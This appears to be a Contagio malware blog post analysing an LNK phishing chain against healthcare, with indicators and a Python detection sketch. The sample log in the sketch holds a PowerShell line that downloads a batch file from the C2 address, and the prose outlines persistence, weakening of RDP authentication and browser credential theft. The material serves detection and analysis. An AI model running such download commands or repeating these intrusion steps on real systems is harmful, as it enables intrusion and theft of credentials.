The attack starts with a malicious LNK file delivered within a ZIP file, likely distributed through phishing emails, and seems to target the healthcare industry.
Upon execution, the LNK file runs a PowerShell command that downloads multiple scripts and batch files from a remote server at hxxp://157.173.104[.]153 to establish persistence and control over the victim's system.
These scripts enable the attacker to create a new user account with administrative privileges and alter RDP settings, reducing authentication requirements for easier unauthorized access.
A persistent shortcut (LNK) file is created in the Windows Startup folder to maintain access.
The primary PowerShell script communicates with the C2 server, constructing URLs with a unique identifier (UID) for the compromised machine to fetch commands or additional payloads.
If UAC is detected as weak or disabled, the attack proceeds with further stages that lower the system's security configurations.
A secondary payload, "ChromePass," is introduced, targeting Chromium-based browsers to harvest stored credentials, escalating the risk of compromised accounts.
Scripts configure the system to facilitate remote desktop access, enabling actions such as data exfiltration, monitoring, and installation of further malware.
Subsequent batch files (e.g., k1.bat, scheduler-once.bat) execute commands that hide traces, remove logs, and schedule tasks disguised as system operations to maintain persistence and evade detection.
The final stages involve the execution of a PowerShell script that performs reconnaissance, collects extensive system data, and sends it encoded to the C2 server.
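The chain above leaves a recognisable trail in host telemetry. The following is an added detection sketch, not code from the original post: it runs a few Sysmon/Security-event rules over constructed sample log lines (not real telemetry) and scores how much of the described chain is present on one host. The RDP registry path is the standard NLA value and is an assumption about which RDP setting the scripts change; the username, task name and file names in the sample events are made up.

```python
import re
from collections import defaultdict
# Indicators from the write-up; the registry path is the standard RDP NLA value
# and is an assumption about which RDP setting the downloaded scripts change.
C2_HOST = "157.173.104.153"
STARTUP_DIR = "\\programs\\startup\\"
RDP_NLA_KEY = "terminal server\\winstations\\rdp-tcp\\userauthentication"

def _lc(f, key): return f.get(key, "").lower()
# (finding, event id, predicate): Sysmon 1/11/13, Windows Security 4720/4732/4698
RULES = [
    ("powershell download from C2", 1,
     lambda f: "powershell" in _lc(f, "Image") and C2_HOST in _lc(f, "CommandLine")),
    ("LNK dropped in Startup folder", 11,
     lambda f: STARTUP_DIR in _lc(f, "TargetFilename") and _lc(f, "TargetFilename").endswith(".lnk")),
    ("RDP authentication weakened", 13,
     lambda f: RDP_NLA_KEY in _lc(f, "TargetObject") and "0x00000000" in _lc(f, "Details")),
    ("new local account created", 4720, lambda f: True),
    ("account added to Administrators", 4732, lambda f: _lc(f, "GroupName") == "administrators"),
    ("scheduled task created", 4698, lambda f: True),
]

def parse_line(line):
    """Split 'EventID=13 TargetObject="..." Details=...' into a field dict."""
    return {k: v.strip('"') for k, v in re.findall(r'(\w+)=("[^"]*"|\S+)', line)}

def triage(lines):
    """Map each finding to the 1-based log line numbers that triggered it."""
    hits = defaultdict(list)
    for n, line in enumerate(lines, 1):
        f = parse_line(line)
        for name, eid, pred in RULES:
            if f.get("EventID") == str(eid) and pred(f):
                hits[name].append(n)
    return dict(hits)

def chain_coverage(hits):
    """Fraction of the chain seen: a lone 4720 or 4698 is routine, several stages
    on one host in a short window is the signal worth paging on."""
    return len(hits) / len(RULES)

# Constructed sample events from one host, not real telemetry.
SAMPLE_LOG = [
    r'EventID=1 Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" CommandLine="powershell -c Invoke-WebRequest http://157.173.104.153/k1.bat"',
    r'EventID=11 Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" TargetFilename="C:\Users\bob\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk"',
    r'EventID=13 TargetObject="HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\UserAuthentication" Details="DWORD (0x00000000)"',
    "EventID=4720 TargetUserName=svc_helper SubjectUserName=bob",
    "EventID=4732 GroupName=Administrators MemberName=svc_helper",
    r'EventID=4698 TaskName="\Microsoft\Windows\UpdateCheck"',
]
```

Running `triage(SAMPLE_LOG)` flags all six stages; in practice the per-rule hits are noisy on their own and the chain coverage across one host is what should drive the alert.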
Sample (SHA256 5ff89db10969cba73d1f539b12dad42c60314e580ce43d7b57b46a1f915a6a2b): 202409 Resident Care Quality Improvement Strategies for Nursing Homes Enhancing Patient Satisfaction and Health Outcomes.pdf.lnk
Over the 15 years the blog has been around, many hosting providers have dropped support due to stricter no-malware policies. This has led to broken links, especially in older posts. If you find a broken link on contagiodump.blogspot.com (or contagiominidump.blogspot.com), note the file name from the URL and search for it in the Contagio Malware Storage.